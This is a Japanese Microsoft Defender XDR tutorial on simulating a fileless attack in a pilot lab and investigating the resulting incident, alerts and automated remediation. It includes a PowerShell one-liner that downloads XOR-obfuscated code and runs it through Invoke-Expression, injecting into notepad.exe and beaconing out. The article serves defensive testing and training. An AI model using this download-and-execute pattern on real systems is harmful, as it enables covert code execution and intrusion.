Microsoft Defender XDRパイロット環境で攻撃シミュレーションを実行する

  • [アーティクル]

この記事は、パイロット環境を使用してMicrosoft Defender XDRでインシデントの調査と対応を実行するプロセスの手順 1/2 です。 このプロセスの詳細については、 概要 に関する記事を参照してください。

パイロット環境を準備したら、シミュレートされた攻撃でインシデントを作成し、Microsoft Defender ポータルを使用して調査および対応することで、Microsoft Defender XDRのインシデント対応と自動調査と修復機能をテストします。

Microsoft Defender XDRのインシデントは、関連付けられたアラートと、攻撃のストーリーを構成する関連データのコレクションです。

Microsoft 365 サービスおよびアプリは、疑わしい、または悪意のあるイベントやアクティビティを検出した場合にアラートを作成します。 個々のアラートは、完了した攻撃、または進行中の攻撃に関する貴重な手がかりとなります。 ただし、攻撃は通常、デバイス、ユーザー、メールボックスなどの異なる種類のエンティティに対抗してさまざまな技術を採用しています。 その結果、テナント内の複数のエンティティに複数のアラートが表示されます。

注:

セキュリティ分析とインシデント対応を初めて使用する場合は、 最初のインシデントへの対応に関するチュートリアル を参照して、分析、修復、インシデント後のレビューの一般的なプロセスのガイド付きツアーを入手してください。

Microsoft Defender ポータルで攻撃をシミュレートする

Microsoft Defender ポータルには、パイロット環境に対するシミュレートされた攻撃を作成するための機能が組み込まれています。

Defender for Office 365 攻撃シミュレーション トレーニング

Microsoft 365 E5またはMicrosoft Defender for Office 365プラン 2 を使用したDefender for Office 365には、フィッシング攻撃の攻撃シミュレーション トレーニングが含まれます。 基本的な手順は次のとおりです。

  1. シミュレーションをCreateする

    新しいシミュレーションを作成して起動する手順については、「 フィッシング攻撃をシミュレートする」を参照してください。

  2. ペイロードをCreateする

    シミュレーション内で使用するペイロードを作成する手順については、「攻撃シミュレーション トレーニング用のカスタム ペイロードをCreateする」を参照してください。

  3. 分析情報の取得

    レポートを使用して分析情報を取得する手順については、「 攻撃シミュレーション トレーニングを通じて分析情報を得る」を参照してください。

詳細については、「 シミュレーション」を参照してください。

Defender for Endpoint 攻撃のチュートリアル & シミュレーション

Microsoft の Defender for Endpoint シミュレーションを次に示します。

  • ドキュメントがバックドアにドロップする
  • 自動調査 (バックドア)

サード パーティのソースからの追加のシミュレーションがあります。 チュートリアルのセットもあります。

シミュレーションまたはチュートリアルごとに、次の手順を実行します。

  1. 提供されている対応するウォークスルー ドキュメントをダウンロードして読みます。

  2. シミュレーション ファイルをダウンロードします。 ファイルまたはスクリプトをテスト デバイスにダウンロードすることもできますが、必須ではありません。

  3. チュートリアル ドキュメントの指示に従って、テスト デバイスでシミュレーション ファイルまたはスクリプトを実行します。

詳細については、「シミュレートされた攻撃によるエクスペリエンス Microsoft Defender for Endpoint」を参照してください。

分離されたドメイン コントローラーとクライアント デバイスを使用して攻撃をシミュレートする (省略可能)

このオプションのインシデント対応演習では、PowerShell スクリプトを使用して分離されたActive Directory Domain Services (AD DS) ドメイン コントローラーと Windows デバイスに対する攻撃をシミュレートし、インシデントを調査、修復、解決します。

まず、パイロット環境にエンドポイントを追加する必要があります。

パイロット環境エンドポイントを追加する

まず、分離された AD DS ドメイン コントローラーと Windows デバイスをパイロット環境に追加する必要があります。

  1. パイロット環境テナントでMicrosoft Defender XDRが有効になっていることを確認します。

  2. ドメイン コントローラーが次のことを確認します。

  3. テスト デバイスが次のことを確認します。

テナントとデバイス グループを使用する場合は、テスト デバイス用の専用デバイス グループを作成し、最上位にプッシュします。

もう 1 つの方法は、AD DS ドメイン コントローラーをホストし、Microsoft Azure インフラストラクチャ サービスで仮想マシンとしてデバイスをテストすることです。 シミュレートされたエンタープライズ テスト ラボ ガイドのフェーズ 1 の手順を使用できますが、APP1 仮想マシンの作成はスキップします。

結果を次に示します。

シミュレートされたエンタープライズ テスト ラボ ガイドを使用した評価環境

高度な手法を利用して検出から隠す高度な攻撃をシミュレートします。 この攻撃により、ドメイン コントローラーで開いているサーバー メッセージ ブロック (SMB) セッションが列挙され、ユーザーのデバイスの最近の IP アドレスが取得されます。 通常、このカテゴリの攻撃には、被害者のデバイスにドロップされたファイルは含まれていないため、メモリ内でのみ発生します。 既存のシステムと管理ツールを使用して "土地から離れて生きる" と、コードをシステム プロセスに挿入して実行を非表示にします。 このような動作により、検出を回避し、デバイスに保持できます。

このシミュレーションでは、サンプル シナリオは PowerShell スクリプトから始まります。 実際には、ユーザーがスクリプトを実行するようにだまされたり、以前に感染したデバイスから別のコンピューターへのリモート接続からスクリプトが実行されたりする可能性があります。これは、攻撃者がネットワーク内を横方向に移動しようとしていることを示します。 管理者は、さまざまな管理アクティビティを実行するためにリモートでスクリプトを実行することも多いため、これらのスクリプトの検出が困難になる場合があります。

プロセス インジェクションと SMB 偵察攻撃を使用したファイルレス PowerShell 攻撃

シミュレーション中に、攻撃によってシェルコードが一見無実のプロセスに挿入されます。 このシナリオでは、notepad.exe を使用する必要があります。 このプロセスをシミュレーション用に選択しましたが、攻撃者は実行時間の長いシステム プロセス (svchost.exe など) をターゲットにする可能性が高くなります。 その後、シェルコードは攻撃者のコマンド アンド コントロール (C2) サーバーに問い合わせて、続行方法の指示を受け取ります。 スクリプトは、ドメイン コントローラー (DC) に対して偵察クエリの実行を試みます。 偵察により、攻撃者は最近のユーザー ログイン情報に関する情報を取得できます。 攻撃者がこの情報を取得したら、ネットワーク内を横方向に移動して特定の機密性の高いアカウントに移動できます

重要

最適な結果を得るには、できるだけ攻撃シミュレーションの指示に従ってください。

分離された AD DS ドメイン コントローラー攻撃シミュレーションを実行する

攻撃シナリオシミュレーションを実行するには:

  1. パイロット環境に、分離された AD DS ドメイン コントローラーと Windows デバイスが含まれていることを確認します。

  2. テスト ユーザー アカウントを使用してテスト デバイスにサインインします。

  3. テスト デバイスでWindows PowerShell ウィンドウを開きます。

  4. 次のシミュレーション スクリプトをコピーします。

    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
;$xor = [System.Text.Encoding]::UTF8.GetBytes('WinATP-Intro-Injection');
$base64String = (Invoke-WebRequest -URI "https://wcdstaticfilesprdeus.blob.core.windows.net/wcdstaticfiles/MTP_Fileless_Recon.txt" -UseBasicParsing).Content;Try{ $contentBytes = [System.Convert]::FromBase64String($base64String) } Catch { $contentBytes = [System.Convert]::FromBase64String($base64String.Substring(3)) };$i = 0;
$decryptedBytes = @();$contentBytes.foreach{ $decryptedBytes += $_ -bxor $xor[$i];
$i++; if ($i -eq $xor.Length) {$i = 0} };Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($decryptedBytes))

    注:

    Web ブラウザーでこの記事を開くと、特定の文字を失ったり改行を追加したりせずにフルテキストをコピーする際に問題が発生する可能性があります。 この場合は、このドキュメントをダウンロードし、Adobe Reader で開きます。

  5. コピーしたスクリプトを PowerShell ウィンドウに貼り付けて実行します。

注:

リモート デスクトップ プロトコル (RDP) を使用して PowerShell を実行している場合は、 CTRL-V ホットキーまたは右クリック貼り付け方法が機能しない可能性があるため、RDP クライアントで [クリップボードテキストの入力] コマンドを使用します。 PowerShell の最近のバージョンでは、そのメソッドも受け入れられない場合があります。最初にメモリ内のメモ帳にコピーし、仮想マシンでコピーしてから PowerShell に貼り付ける必要があります。

数秒後、メモ帳アプリが開きます。 シミュレートされた攻撃コードがメモ帳に挿入されます。 完全なシナリオを体験するには、自動的に生成されたメモ帳インスタンスを開いたままにします。

シミュレートされた攻撃コードは、外部 IP アドレスへの通信 (C2 サーバーのシミュレート) を試み、SMB を介してドメイン コントローラーに対する偵察を試みます。

このスクリプトが完了すると、PowerShell コンソールに次のメッセージが表示されます。

ran NetSessionEnum against [DC Name] with return code result 0

自動インシデントと応答機能の動作を確認するには、notepad.exe プロセスを開いたままにします。 自動インシデントと応答によってメモ帳プロセスが停止する方法が表示されます。

シミュレートされた攻撃のインシデントを調査する

注:

このシミュレーションについて説明する前に、次のビデオをwatchして、インシデント管理を使用して、関連するアラートを調査プロセスの一部としてまとめる方法、ポータルで検出できる場所、セキュリティ運用にどのように役立つかを確認します。

SOC アナリストの観点に切り替えると、Microsoft Defender ポータルで攻撃の調査を開始できるようになりました。

  1. Microsoft Defender ポータルを開きます。

  2. ナビゲーション ウィンドウで、[インシデント] & [アラート > インシデント] を選択します。

  3. シミュレートされた攻撃の新しいインシデントがインシデント キューに表示されます。

    Incidents キューの例

1 つのインシデントとして攻撃を調査する

Microsoft Defender XDR分析を関連付け、関連するすべてのアラートと調査を異なる製品から 1 つのインシデント エンティティに集計します。 そうすることで、Microsoft Defender XDRはより広範な攻撃ストーリーを示し、SOC アナリストは複雑な脅威を理解して対応できます。

このシミュレーション中に生成されたアラートは同じ脅威に関連付けられます。その結果、1 つのインシデントとして自動的に集計されます。

インシデントを表示するには:

  1. Microsoft Defender ポータルを開きます。

  2. ナビゲーション ウィンドウで、[インシデント] & [アラート > インシデント] を選択します。

  3. インシデント名の左側にある円をクリックして、最新の項目を選択します。 サイド パネルには、関連するすべてのアラートなど、インシデントに関する追加情報が表示されます。 各インシデントには、含まれるアラートの属性に基づいて説明する一意の名前があります。

    ダッシュボードに表示されるアラートは、サービス リソース (Microsoft Defender for Identity、Microsoft Defender for Cloud Apps、Microsoft Defender for Endpoint、Microsoft Defender XDR、およびMicrosoft Defender for Office 365。

  4. [ インシデント ページを開く] を選択して、インシデントの詳細を取得します。

    [ インシデント ] ページでは、インシデントに関連するすべてのアラートと情報を確認できます。 この情報には、アラートに関連するエンティティと資産、アラートの検出ソース (Microsoft Defender for IdentityやMicrosoft Defender for Endpointなど)、およびそれらがリンクされた理由が含まれます。 インシデント アラートの一覧を確認すると、攻撃の進行状況が表示されます。 このビューでは、個々のアラートを確認して調査できます。

    右側のメニューで [ インシデントの管理 ] をクリックして、インシデントにタグを付け、自分に割り当て、コメントを追加することもできます。

生成されたアラートを確認する

シミュレートされた攻撃中に生成されたアラートの一部を見てみましょう。

注:

シミュレートされた攻撃中に生成されたアラートのほんの一部について説明します。 Windows のバージョンとテスト デバイスで実行されているMicrosoft Defender XDR製品によっては、少し異なる順序で表示されるアラートが増える場合があります。

生成されたアラートの例

アラート: 疑わしいプロセスの挿入が観察されました (ソース: Microsoft Defender for Endpoint)

高度な攻撃者は、高度で隠密な方法を使用してメモリに保持し、検出ツールから非表示にします。 一般的な手法の 1 つは、悪意のある実行可能ファイルではなく、信頼されたシステム プロセス内から操作し、検出ツールとセキュリティ操作で悪意のあるコードを見つけにくくすることです。

SOC アナリストがこれらの高度な攻撃をキャッチできるように、Microsoft Defender for Endpointのディープ メモリ センサーは、さまざまなクロスプロセス コード インジェクション手法に対するこれまでにない可視性をクラウド サービスに提供します。 次の図は、 notepad.exeへのコード の挿入試行で Defender for Endpoint がどのように検出され、警告されるかを示しています。

悪意のある可能性のあるコードの挿入に関するアラートの例

アラート: コマンド ライン引数を指定せずに実行されたプロセスによって観察される予期しない動作 (ソース: Microsoft Defender for Endpoint)

Microsoft Defender for Endpoint検出は、多くの場合、攻撃手法の最も一般的な属性を対象とします。 この方法により、持続性が確保され、攻撃者が新しい戦術に切り替えるバーが発生します。

大規模な学習アルゴリズムを使用して、organizationおよび世界中の一般的なプロセスの正常な動作を確立し、これらのプロセスが異常な動作を示す場合のwatchします。 これらの異常な動作は、多くの場合、不要なコードが導入され、それ以外の場合は信頼できるプロセスで実行されていることを示します。

このシナリオでは、 notepad.exe プロセスは、外部の場所との通信を伴う異常な動作を示しています。 この結果は、悪意のあるコードの導入と実行に使用される特定の方法とは無関係です。

注:

このアラートは、追加のバックエンド処理を必要とする機械学習モデルに基づいているため、このアラートがポータルに表示されるまでに時間がかかる場合があります。

アラートの詳細には、外部 IP アドレス (ピボットとして使用して調査を拡大できるインジケーター) が含まれています。

アラート プロセス ツリーで IP アドレスを選択して、IP アドレスの詳細ページを表示します。

コマンド ライン引数なしで実行されるプロセスによる予期しない動作の例

次の図は、選択した IP アドレスの詳細ページを表示します (アラート プロセス ツリーで [IP アドレス] をクリック)。

IP アドレスの詳細ページの例

アラート: ユーザーと IP アドレス偵察 (SMB) (ソース: Microsoft Defender for Identity)

サーバー メッセージ ブロック (SMB) プロトコルを使用した列挙により、攻撃者は、特定の機密性の高いアカウントにアクセスするためにネットワーク内を横方向に移動するのに役立つ最近のユーザー ログオン情報を取得できます。

この検出では、SMB セッション列挙がドメイン コントローラーに対して実行されたときにアラートがトリガーされます。

ユーザーと IP アドレスの偵察に対するMicrosoft Defender for Identityアラートの例

Microsoft Defender for Endpointを使用してデバイスのタイムラインを確認する

このインシデントのさまざまなアラートを調べた後、前に調査したインシデント ページに戻ります。 [インシデント] ページの [デバイス] タブを選択して、Microsoft Defender for EndpointおよびMicrosoft Defender for Identityによって報告された、このインシデントに関連するデバイスを確認します。

攻撃が行われたデバイスの名前を選択して、その特定のデバイスのエンティティ ページを開きます。 そのページでは、トリガーされたアラートと関連イベントを確認できます。

[タイムライン] タブを選択して、デバイスのタイムラインを開き、デバイスで観察されたすべてのイベントと動作を時系列で表示し、アラートが発生した状態で散在します。

動作を使用したデバイス タイムラインの例

より興味深い動作の一部を拡張すると、プロセス ツリーなどの便利な詳細が提供されます。

たとえば、アラート イベントが検出されるまで下にスクロール し、疑わしいプロセスの挿入が観察されます。 その下 notepad.exe プロセス イベントに挿入されたpowershell.exe を選択して、サイド ウィンドウの [イベント エンティティ ] グラフの下に、この動作の完全なプロセス ツリーを表示します。 必要に応じて、検索バーを使用してフィルター処理を行います。

選択した PowerShell ファイル作成動作のプロセス ツリーの例

Microsoft Defender for Cloud Appsを使用してユーザー情報を確認する

インシデント ページで、[ ユーザー ] タブを選択して、攻撃に関与したユーザーの一覧を表示します。 テーブルには、各ユーザーの 調査優先度 スコアなど、各ユーザーに関する追加情報が含まれています。

ユーザー名を選択して、詳細な調査を行うことができるユーザーのプロファイル ページを開きます。 リスクの高いユーザーの調査について詳しくは、こちらをご覧ください

Defender for Cloud Apps ユーザー ページ

調査と修復の自動化

注:

このシミュレーションについて説明する前に、次のビデオをwatchして、自動自己修復とは何か、ポータルでどこで見つけるか、セキュリティ運用にどのように役立つかを理解してください。

Microsoft Defender ポータルでインシデントに戻ります。 [インシデント] ページの [調査] タブには、Microsoft Defender for IdentityとMicrosoft Defender for Endpointによってトリガーされた自動調査が表示されます。 次のスクリーンショットは、Defender for Endpoint によってトリガーされた自動調査のみを示しています。 既定では、Defender for Endpoint は、キューで見つかった成果物を自動的に修復します。これには修復が必要です。

インシデントに関連する自動調査の例

調査をトリガーしたアラートを選択して、[調査の 詳細 ] ページを開きます。 次の詳細が表示されます。

  • 自動調査をトリガーしたアラート。
  • 影響を受けたユーザーとデバイス。 インジケーターが追加のデバイスで見つかった場合は、これらの追加のデバイスも一覧表示されます。
  • 証拠の一覧。 ファイル、プロセス、サービス、ドライバー、ネットワーク アドレスなど、検出および分析されたエンティティ。 これらのエンティティは、アラートとの関係の可能性について分析され、無害または悪意があると評価されます。
  • 脅威が見つかりました。 調査中に検出された既知の脅威。

注:

タイミングによっては、自動調査がまだ実行されている可能性があります。 証拠を収集して分析し、結果を確認する前に、プロセスが完了するまで数分待ちます。 最新の結果を取得するには、[ 調査の詳細 ] ページを更新します。

[調査の詳細] ページの例

自動調査中に、Microsoft Defender for Endpointは、修復を必要とする成果物の 1 つとして挿入された notepad.exe プロセスを特定しました。 Defender for Endpoint は、自動修復の一部として疑わしいプロセスの挿入を自動的に停止します。

テスト デバイス notepad.exe 実行中のプロセスの一覧から消えるのを確認できます。

インシデントを解決する

調査が完了し、修復が確認されたら、インシデントを解決します。

[ インシデント ] ページで、[ インシデントの管理] を選択します。 状態を [インシデントの解決 ] に設定し、分類の 場合は True アラート を選択し、判定の セキュリティ テスト を選択します。

[インシデントの管理] パネルを開き、スイッチをクリックしてインシデントを解決できるインシデント ページの例

インシデントが解決されると、Microsoft Defender ポータルと関連ポータルで関連付けられているすべてのアラートが解決されます。

これにより、インシデント分析、自動調査、インシデント解決のための攻撃シミュレーションがまとめられます。

次の手順

Microsoft Defender XDRインシデント対応機能

手順 2/2: インシデント対応機能Microsoft Defender XDR試す

Microsoft Defender XDR評価環境のCreate

ヒント

さらに多くの情報を得るには、 Tech Community: Microsoft Defender XDR Tech Community の Microsoft Security コミュニティとEngageします